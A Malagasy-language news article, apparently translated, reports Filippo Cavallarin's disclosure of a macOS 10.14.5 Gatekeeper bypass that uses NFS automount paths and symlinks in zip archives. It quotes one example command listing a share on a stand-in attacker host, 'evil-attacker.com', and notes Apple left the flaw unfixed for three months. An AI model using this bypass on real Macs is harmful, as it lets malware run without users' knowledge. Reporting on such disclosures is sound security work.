Mora ny mametraka fampiharana ratsy amin'ny Mac. Apple dia tsy nanamboatra ny fahadisoana na dia afaka telo volana aza

27. 5. 2019

Filippo Cavallarin, mpikaroka momba ny fiarovana, dia nandefa fampitandremana momba ny bug amin'ny macOS 10.14.5 tao amin'ny bilaoginy. Izany dia ahitana ny mety handosirana tanteraka ny fepetra fiarovana ny Gatekeeper. Araka ny voalazan'i Cavallarin, dia nanondro ny fahadisoana tamin'i Apple izy tamin'ny Febroary tamin'ity taona ity, saingy tsy nanamboatra izany ny orinasa tamin'ny fanavaozana farany.

Ny Gatekeeper dia novolavolain'i Apple ary nampidirina voalohany tao amin'ny rafitra fiasan'ny biraony tamin'ny taona 2012. Izy io dia rafitra iray manakana ny fampiharana tsy mandeha tsy misy fahalalan'ny mpampiasa sy ny faneken'ny mpampiasa. Rehefa avy misintona fampiharana ianao dia manamarina ho azy ny kaodiny ny Gatekeeper mba hahitana raha nosoniavin'i Apple tsara ilay rindrambaiko.

Ao amin'ny lahatsorany bilaogy, Cavallarin dia milaza fa ny Gatekeeper, amin'ny alàlan'ny default, dia mihevitra ny fitahirizana ivelany sy ny fizarana tambajotra ho toerana azo antoka. Ny fampiharana rehetra mipetraka amin'ireo tanjona ireo dia azo atomboka ho azy fa tsy mila mandeha amin'ny fanamarinana Gatekeeper. Io endri-javatra io no azo trandrahana amin'ny fandefasana rindrambaiko maloto nefa tsy fantatry ny mpampiasa.

Ny lafiny iray mamela ny fidirana tsy nahazoana alalana dia ny endri-javatra automatique, izay ahafahan'ny mpampiasa mametraka ho azy ny ampahany amin'ny tambajotra amin'ny alàlan'ny famaritana lalana iray manomboka amin'ny "/net/". Ohatra, i Cavallarin dia mitanisa ny lalana "ls /net/evil-attacker.com/sharedfolder/" izay mety hahatonga ny rafitra fandidiana hampiditra ny votoatin'ny lahatahiry "sharefolder" any amin'ny toerana lavitra izay mety hanimba.

Azonao atao ny mijery ny fomba fiasan'ny fandrahonana amin'ny video:

Ny antony iray hafa dia ny hoe raha zaraina ny archive zip misy symlink manokana mankany amin'ny fiasan'ny automount, dia tsy hojeren'ny Gatekeeper izany. Amin'izany fomba izany, ny niharam-boina dia afaka misintona mora foana ny arisiva maloto ary mamoha azy io, mamela ny mpanafika hampandeha saika izay rindrambaiko rehetra ao amin'ny Mac nefa tsy fantatry ny mpampiasa. Ny Finder, izay manafina ny fanitarana sasany amin'ny alàlan'ny default, dia manana ny anjarany amin'ity vulnerable ity ihany koa.

Cavallarin dia nanambara tao amin'ny bilaoginy fa Apple dia nisarika ny saina ho amin'ny faharefoan'ny rafitra fandidiana macOS tamin'ny 22 febroary tamin'ity taona ity. Saingy tamin'ny tapaky ny volana Mey dia nijanona tsy nifandray tamin'i Cavallarin i Apple, ka nanapa-kevitra i Cavallarin fa hampahafantatra ny zava-drehetra.

loharanom-baovao: FCVL

Lohahevitra: fitahirizana, ho azy, MacOS, Video, Fikirana, asa, mpampiasa, Fampiharana, Apple

Resadresaka momba ny lahatsoratra

Ny anaranao

Ny hevitrao

Amin'ny famenoana ireo angon-drakitra etsy ambony, dia manaiky aho fa ny orinasa TEXT FACTORY s.r.o., birao voasoratra anarana ao Brno, Durďákova 336/29, Černá Pole, kaody paositra: 613 00, laharana ID: 06157831, voasoratra ao amin'ny Fitsarana isam-paritra ao Brno, fizarana C , ampidiro 100399, dia hikarakara ny angon-drakitra manokana omena ao amin'ny taratasy fisoratana anarana nofenoiko noho ny tombontsoa ara-dalàna ny TEXT FACTORY s.r.o araka ny andininy faha-6 andalana 1 taratasy f) GDPR ary manatanteraka adidy ara-dalàna (Andininy 6, andalana 1, litera c) GDPR), ho an'ireto tanjona manaraka ireto: ny filàna antoka ny fanomezan-dàlana ny mpitsidika amin'ny tranokala tantanin'ny TEXT FACTORY s.r.o. handray anjara mavitrika amin'ny lahatsoratra navoaka na ao anatin'ny adihevitra forums ary mampiasa ny zon'ny TEXT FACTORY s.r.o. amin'ny maha-mpitantana an'ireo sehatra fifanakalozan-kevitra ireo. Ny fampahalalana bebe kokoa momba ny fanodinana ny angon-drakitra manokana sy ny zo dia azo jerena ao Lesona momba ny fiarovana ny angon-drakitra manokana. ny lahatsoratra manontolo

Mety ho izany mahaliana anao

mifandraika